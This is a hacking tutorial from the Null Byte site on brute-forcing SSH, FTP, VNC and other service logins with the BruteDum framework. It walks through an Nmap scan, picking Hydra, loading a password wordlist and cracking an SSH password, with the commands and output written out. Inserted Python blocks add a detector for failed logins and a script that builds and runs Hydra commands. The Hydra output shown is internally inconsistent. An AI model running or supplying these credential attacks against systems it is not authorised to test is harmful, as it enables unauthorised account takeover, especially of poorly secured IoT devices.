
How to Brute-Force SSH, FTP, VNC & More with BruteDum « Null Byte :: WonderHowTo



Brute-forcing is an easy way to discover weak login credentials, and it is often one of the first steps a hacker takes after finding network services running on a network they have access to. For beginners as well as experienced hackers, it helps to have the right tools at hand to discover, classify, and then launch customized brute-force attacks against a target. BruteDum does all of this from a single framework.

Weak Passwords Are Easy Prey

When a hacker gains access to a network with services running on it, one of the first things they usually do is check whether they can log in to any of those services using default or common credentials. Internet of Things (IoT) hardware and devices such as routers are often left with default passwords enabled, making them easy to attack.

To test the services they discover for weak passwords, the hacker must pick the right tool for the job, and it can be confusing to know which tool is best for a particular service.

BruteDum is a Python tool that lets a hacker first specify a target and then run a port scan to determine the best tool based on what is discovered. It makes it easy to run a brute-force or dictionary attack against almost any standard protocol that is vulnerable to one.

The advantage of running BruteDum over the individual tools is the ability to scan from within the framework to identify which other services might be running on the same device, while having powerful tools for breaking into user accounts on services such as SSH organized under a single interface.

Online or Connected Attacks

Unlike attacks against WPA networks, where we can capture a handshake and try to crack it later offline, we must be connected to our target over the network to run a brute-force or dictionary attack. While there are ways to hide our identity with a VPN or Tor, online brute-force and dictionary attacks can be limited in effectiveness in several ways.

One way to limit brute-force and dictionary attacks is rate limiting, where a lockout is triggered after a certain number of incorrect login attempts. That, combined with flagging suspicious login attempts, makes brute-force and dictionary attacks more likely to tip off the target.

To run an online dictionary attack, we use THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks across these tools. We also need a password list, which is crucial to the success or failure of a dictionary attack. If the password list is too large, the attack takes too long; if it is too short to contain the password, we run the risk that the password is not in the list at all, and the attack fails.
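The rate limiting and flagging described above, from the defender's side, as an added Python example that is not part of the original article: a small detector run over constructed sshd auth.log lines (the source address 192.168.43.50, the log year, the threshold and the window are all assumptions). A source that exceeds the failure threshold inside the window is flagged, which is where a lockout would fire, and a later successful login from a flagged source is reported separately, since that is exactly what a dictionary attack that worked looks like to the target.

```python
# Added example (not from the original article or from BruteDum):
# per-source failed-login detector over constructed sshd log lines.
import re
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5    # assumption: failures tolerated per source inside the window
WINDOW = 60      # assumption: window length in seconds
LOG_YEAR = 2020  # syslog timestamps carry no year; assumed to match the sample

# Constructed sample: OpenSSH auth.log lines, not real captured data.
SAMPLE_LOG = """\
Jan 10 09:23:30 pi sshd[812]: Failed password for toor from 192.168.43.50 port 50212 ssh2
Jan 10 09:23:31 pi sshd[813]: Failed password for toor from 192.168.43.50 port 50213 ssh2
Jan 10 09:23:31 pi sshd[814]: Failed password for toor from 192.168.43.50 port 50214 ssh2
Jan 10 09:23:32 pi sshd[815]: Failed password for toor from 192.168.43.50 port 50215 ssh2
Jan 10 09:23:32 pi sshd[816]: Failed password for toor from 192.168.43.50 port 50216 ssh2
Jan 10 09:23:33 pi sshd[817]: Failed password for invalid user admin from 192.168.43.50 port 50217 ssh2
Jan 10 09:23:34 pi sshd[818]: Accepted password for toor from 192.168.43.50 port 50218 ssh2
Jan 10 09:40:00 pi sshd[900]: Failed password for alice from 192.168.43.7 port 41000 ssh2
Jan 10 09:41:00 pi sshd[901]: Accepted password for alice from 192.168.43.7 port 41001 ssh2
"""

# Matches both "Failed password for USER" and "Failed password for invalid user USER".
LINE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port"
)


def parse(line):
    """Return (epoch_seconds, outcome, user, source_ip), or None for other lines."""
    m = LINE.match(line)
    if not m:
        return None
    stamp, outcome, user, src = m.groups()
    when = datetime.strptime(f"{LOG_YEAR} {stamp}", "%Y %b %d %H:%M:%S")
    return when.timestamp(), outcome, user, src


def detect(log, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of failures per source IP.

    Returns (flagged, compromised): the set of sources that exceeded
    `threshold` failures within `window` seconds, and the set of
    (source, user) pairs that logged in successfully after being flagged.
    """
    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    flagged, compromised = set(), set()
    for line in log.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        now, outcome, user, src = rec
        q = recent[src]
        while q and now - q[0] > window:
            q.popleft()              # expire failures older than the window
        if outcome == "Failed":
            q.append(now)
            if len(q) > threshold:
                flagged.add(src)     # this is where a lockout would trigger
        elif src in flagged:
            compromised.add((src, user))  # success right after a burst of failures
    return flagged, compromised


if __name__ == "__main__":
    flagged, compromised = detect(SAMPLE_LOG)
    print("flagged sources:", sorted(flagged))
    print("successful logins after flagging:", sorted(compromised))
```

With these defaults, the 208 login tries that Hydra reports later in this guide, spread over 16 parallel tasks, would cross the threshold within the first second of the run; a single failed login from alice never comes close. Raise `threshold` and the same log produces no alert at all, which is the trade-off a defender tunes and the reason a slow, low-volume attack is harder to spot.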

What you need

To follow this guide, you must have Python 3 installed on your system. I also recommend using Kali Linux, since most of the required programs are installed by default. If you do this on another system, you must make sure that you have installed all the required programs.

If you are not using Kali Linux, you can use Ubuntu or Debian, but you must make sure that Hydra, Medusa, and Ncrack are installed. You also need Nmap for scanning.

We also need a password list to test with, and in this case we will download one into the folder we create later. If you have a favorite password list, copy it into that folder once it is created.

Step 1: Download and set up BruteDum

To start, we need to download the repository from GitHub. In a new terminal window, type the following command to clone the repo.

  ~ $ git clone https://github.com/GitHackTools/BruteDum

Cloning into 'BruteDum'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (15/15), done.

And this to navigate into the folder:

  ~ $ cd BruteDum 

From this folder you can run BruteDum. Before we do that, we have to work around a small quirk. I found that BruteDum could not find password lists stored outside the BruteDum folder, so the solution is to put our password list directly there. To do this, I simply grab one from GitHub and download it into the folder I am working in with the wget command.

  ~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt

--2020-01-10 17:19:59--  https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1620 (1.6K) [text/plain]
Saving to: 'Top207-probable-v2.txt'

Top207-probable-v2. 100%[===================>]   1.58K  --.-KB/s    in 0s

2020-01-10 17:19:59 (53.3 MB/s) - 'Top207-probable-v2.txt' saved [1620/1620]

When that is done, we can run BruteDum by typing the following command.

  ~ / BruteDum $ python3 brutedum.py

(BruteDum ASCII-art banner: "BRUTE FORCE JUST FOR DUMMIES")

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com

[?] Enter the victim address: 

Step 2: Enter the Target Address

After the banner has loaded, we must enter the IP address of the target. Once you have done this, press Enter and you will be given the option to run an Nmap scan. This is a useful feature that lets you discover other services that are open on the same device. Type Y and press Enter to run the Nmap scan.

  [?] Enter the victim address: 192.168.43.1

[?] Do you want to scan the victim's ports with Nmap? [Y/n]: Y

When the results come back, you should be able to identify all ports that are reported as open. You must then select a service to crack. The menu for this is fairly easy to follow, and you can choose the entry that matches the service our Nmap scan discovered.

  [+] Scanning ports with Nmap...

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT
Nmap scan report for 192.168.43.1
Host is up (0.0087s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: ███.███.███.███.███.███

Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds

[1] FTP                     [2] Telnet
    (Default port is 21)        (Default port is 23)
[3] PostgreSQL              [4] SSH
    (Default port is 5432)      (Default port is 22)
[5] RDP                     [6] VNC
    (Default port is 3389)      (Default port is 5900)

[?] Which protocol do you want to crack? [1-6]: 4

In our example, we select option 4 and press Enter to indicate that we want to crack SSH.

Step 3: Select the Tool

Now we must choose the tool we will use to try to crack the password. Depending on the service we selected, BruteDum will recommend one.

  (BruteDum ASCII-art banner: "BRUTE FORCE JUST FOR DUMMIES")

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com

[i] Target: 192.168.43.1
    Protocol: ssh

[1] Ncrack
[2] Hydra (recommended)
[3] Medusa

[?] Which tool do you want to use? [1-3]: 2

We select Hydra because it is recommended for cracking SSH. Type 2 to specify Hydra (or the number of whichever tool you want to use) and press Enter to begin configuring the attack.

Step 4: Set Username and Password Lists

To launch our attack, we have to make a trade-off between time and probability. Our first option is whether to use a username list. That means trying every password in our password list against every username in our username list, which adds up to a large number of attempts very quickly.

In our example, we select N to decline using a username list. Instead, we use a common username, or one we know exists by default on this type of device.

  [i] Target: 192.168.43.1
    Protocol: ssh
[?] Do you want to use a username list? [Y/n]: N

Because we declined to provide a username list, we must enter a username manually instead. Here I will enter toor because I know that this is the username on our test device.

  [?] Enter the username: toor 

Next we need to set the password list. It does not work if we select a password list outside the folder we are in, so now we can use the password list we downloaded earlier. If you followed along above, you should be able to simply enter the filename of the wordlist, Top207-probable-v2.txt, here.

  [?] Enter the wordlist path: Top207-probable-v2.txt

Step 5: Start the Attack

Finally, we can decide whether to use the default port or not. Some devices host services on a port other than the default, but this is not very common. For SSH, the default port is 22, so we just type Y and press Enter.

  [?] Do you want to use the default port? [Y/n]: Y

If you are attacking a service on a non-standard port, decline the default here and specify the port number when prompted, then press Enter. Do not accidentally type the port number at this Y/n prompt, because the script will crash.

Once the port is set, BruteDum launches the tool you chose.

  [i] Target: 192.168.43.1
    Protocol: ssh
[+] Hydra is cracking...

Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task
[DATA] attacking ssh://192.168.43.1:22/

After some time spent attacking the service and trying every password, you get a result: either the password is revealed, or Hydra reports that no valid password was found.

  [22][ssh] host: 192.168.43.1   login:   password: root
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18

[?] Do you want to continue? [Y/n]: N
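The five steps above collapse to a single Hydra command. As an added Python example (not BruteDum's own code and not from the original article), here is what BruteDum does behind its prompts: parse the Nmap output for open ports, keep the ones its menu can attack, and build the Hydra command line. The Nmap text is a constructed copy of the scan in Step 2; the port 2222 and the filename users.txt used in the usage note are assumptions. It also bakes in the `-t 4` that Hydra's own [WARNING] above asks for against SSH, which the run above did not use (it ran at Hydra's default of 16 tasks).

```python
# Added example (not BruteDum's or the article's code): BruteDum's prompts
# expressed as an Nmap output parse plus the underlying Hydra command line.
import re
import shutil
import subprocess

# Port -> Hydra module for the six services BruteDum's menu offers.
# Hydra's PostgreSQL module is named "postgres".
SERVICE_BY_PORT = {21: "ftp", 23: "telnet", 5432: "postgres",
                   22: "ssh", 3389: "rdp", 5900: "vnc"}
DEFAULT_PORT = {svc: port for port, svc in SERVICE_BY_PORT.items()}

# Constructed copy of the Nmap normal output shown in Step 2 (sample data).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.43.1
Host is up (0.0087s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


def open_ports(nmap_output):
    """Return {port: nmap_service_name} for lines whose STATE is 'open'."""
    return {int(port): svc
            for port, _proto, state, svc in PORT_LINE.findall(nmap_output)
            if state == "open"}


def crackable(ports):
    """Keep only the open ports Hydra can attack via BruteDum's menu."""
    return {p: SERVICE_BY_PORT[p] for p in ports if p in SERVICE_BY_PORT}


def hydra_argv(target, module, port=None, user=None, userlist=None,
               wordlist="Top207-probable-v2.txt", tasks=4):
    """Build Hydra's argv for the answers given at BruteDum's prompts.

    -l USER or -L FILE  a single username or a username list (exactly one)
    -P FILE             the password list
    -t N                parallel tasks; 4 is what Hydra's SSH warning recommends
    -s PORT             only when the port is not the module's default
    """
    if (user is None) == (userlist is None):
        raise ValueError("give exactly one of user= or userlist=")
    argv = ["hydra"]
    argv += ["-l", user] if user is not None else ["-L", userlist]
    argv += ["-P", wordlist, "-t", str(tasks)]
    if port is not None and port != DEFAULT_PORT[module]:
        argv += ["-s", str(port)]
    argv.append(f"{module}://{target}")
    return argv


def run(argv):
    """Run Hydra if it is installed; otherwise just report the command."""
    if shutil.which(argv[0]) is None:
        print("hydra not installed; would run:", " ".join(argv))
        return None
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # Only prints the commands; call run() yourself against a host you are authorized to test.
    services = crackable(open_ports(SAMPLE_NMAP))   # {21: 'ftp', 22: 'ssh'}
    for port, module in services.items():
        argv = hydra_argv("192.168.43.1", module, port, user="toor")
        print(f"{module} on {port}:", " ".join(argv))
```

For the SSH case above this yields `hydra -l toor -P Top207-probable-v2.txt -t 4 ssh://192.168.43.1`; answering N at the default-port prompt and giving 2222 adds `-s 2222`, and supplying a username list such as users.txt swaps `-l toor` for `-L users.txt`, which is what multiplies the try count Hydra prints in its [DATA] line.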

Brute-Force Attacks Find Weak Passwords

An important thing to remember about brute-force and dictionary attacks is that they are powerful in the right situation, but no silver bullet for breaking into accounts. Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. Burning through those longer lists requires prolonged contact with the target, which makes the attack less practical and more visible to anyone watching for this type of activity.

The ideal targets for these attacks are mainly IoT devices, which generally have poor security and an abundance of services running with default credentials.

I hope you enjoyed this guide to brute-forcing weak login credentials with BruteDum! If you have any questions about this tutorial on brute-forcing frameworks or have a comment, there is the comments section below, and you can reach me on Twitter @KodyKinzie.


Cover image by Kody / Null Byte



